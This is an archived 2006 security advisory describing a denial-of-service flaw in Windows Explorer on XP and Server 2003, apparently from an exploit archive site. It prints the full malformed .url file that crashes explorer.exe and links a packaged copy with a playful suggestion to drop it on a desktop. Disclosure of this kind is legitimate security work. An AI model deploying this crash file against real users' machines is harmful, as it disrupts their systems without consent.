weURL.txt

weURL.txt: Posted Jul 9, 2006; Authored by Nanika | Site hitcon.org; When Windows Explorer (explorer.exe) parses a malformed .url file it is susceptible to a denial of service.; tags | advisory, denial of service; systems | windows; SHA-256 | c3856e94dae33fcecb3dd9550d99ff03a19ebbd7adf295e105b72716f12a1615; Download | Favorite | View

weURL.txt

Windows Explorer URL File format overflow


Affected Vendor:
Microsoft 

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org

Top Authors In Last 30 Days

Red Hat 220 files
indoushka 88 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,098)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,715)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,486)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,742)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

weURL.txt

weURL.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

weURL.txt

Share This

weURL.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems